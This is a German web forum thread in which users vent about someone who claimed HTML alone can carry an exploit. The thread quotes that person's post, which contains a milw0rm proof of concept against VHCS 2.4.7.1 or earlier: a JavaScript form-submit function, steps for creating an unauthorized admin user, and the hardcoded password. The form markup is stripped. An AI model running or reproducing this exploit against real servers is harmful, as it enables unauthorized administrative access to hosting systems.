mmofacts.com

Ärgern oder totlachen? Nervlich am Ende...

gepostet vor 18 Jahre von MagicForrest
Was würdet ihr machen, obwohl ihr schon stundenlang versucht das ganze aufzuklären - und denjenigem auch zu erklären das HTML keine Programmiersprache ist, und schon garnicht mit C++ zu vergleichen ist?
Würdet ihr euch ärger, totlachen.. oder... was sonst?
Ich weiß, es ist spam usw.. deshalb auch in dem Forum. Aber würde gerne paar Meinungen hören.. ich bin mit meinen Nerven am Ende....
Vor allem der erste Satz... er meinte er sei ganz toll. kann in HTML ein exploit machen, ohne Script oder ähnliches... ich war kurz davor mir die Kugel zu geben... -.-
[quote="Firestormpro"]so: exploit in html
für jemanden, den ich nicht nennen will, aber der meint sowas gibt es nicht...

VHCS (version <= 2.4.7.1) PoC.  By RoMaNSoFt
function submitform()
{
if (document.admin_add_user.username.value=='admin')
{
alert('Learn to read before launching an exploit, script-kiddie!');
exit();
}

document.admin_add_user.action=document.admin_add_user.target.value;
document.admin_add_user.submit();
}



VHCS (version <= 2.4.7.1) PoC.  By RoMaNSoFt  [08.Feb.2006]






 

 



  Target URL






  Username

 (should NOT exist)



 
Exploit it!


 











Quick instructions.-

1.- Enable JavaScript. Fill in the form with appropiate target URL (usually you will only need to replace string) and username.
2.- Remember not to use a probably existing username (such as "admin").
3.- Launch the exploit. If target system is vulnerable, a new VHCS admin user will be created ;-)
4.- You will be redirected to VHCS login page. Try to login with your brand new username.
5.- Ummm, I forgot it... The password is: dsrrocks.

More info (analysis, fix, etc).-

See RS-2006-1.



# milw0rm.com [2006-02-23]
gepostet vor 18 Jahre von TheUndeadable
Immer lächeln, immer lächeln.
und ganz wichtig: Begeb dich nicht auf sein Niveau herab, er schlägt dich mit seinen Waffen ;-)
gepostet vor 18 Jahre von Klaus
Ich würde sagen er soll erstmal lernen sauberes HTML zu schreiben.
Außerdem verstehe ich nicht, was hier "ohne Skript" läuft.
gepostet vor 18 Jahre von MagicForrest
Eben.. ich versteh das nicht...
Wie können manche Menschen nur so.... argh.. ich weiß nicht wie ich das schreiben soll.. ich will dir Wörter die mir durch den Kopf gehen nicht schreiben...
Ich finds ja OK wenn einer mal irgend nen Quatsch behauptet.. aber wenn man dem das mehrmals, etliche male! nett erklärt, und dann kommt der so daher...
Wird gleich beleidigend und schreibt eigentlich so nen Schrott...
Irgendwie verlier ich da schnell die Nerven...
Lächeln? Hm.. das konnte ich anfangs, aber jetzt nicht mehr.
Eher fast totlachen. Aber trotzdem ist das... nunja..
gepostet vor 18 Jahre von Drezil
da gibt es so eine nette funktion namens "ignore list" .. da wandern solche vollpfosten für gewöhnlich hin, damit sie nicht nerven ..
gepostet vor 18 Jahre von MagicForrest
Das ganze ist in einem anderen Forum, und es sind keine PNs.
Damit macht er sich offiziell lächerlich, wenn ich das mal so sagen darf, nur ignore-list o.ä. funktioniert leider nicht.
Aber ich werde das Thema von nun an meiden.
Er wurde verwarnt, wird in Zukunft auch aufpassen was für nen Quatsch er erzählt, denk ich.
Falls ich euch damit nerv - sorry. Aber ich musste mich irgendwie wieder .. nunja.. ich möchte fast sagen beruhigen...
Was für Vorstellungen und Ideen manche Leute haben... sowas gehört doch verboten...
Aber ich muss sagen es ist schön zu wissen, das hier bei GalaxyNews immer ein gutes Niveau zu finden ist. Irgendwie erholsam im Moment

Auf diese Diskussion antworten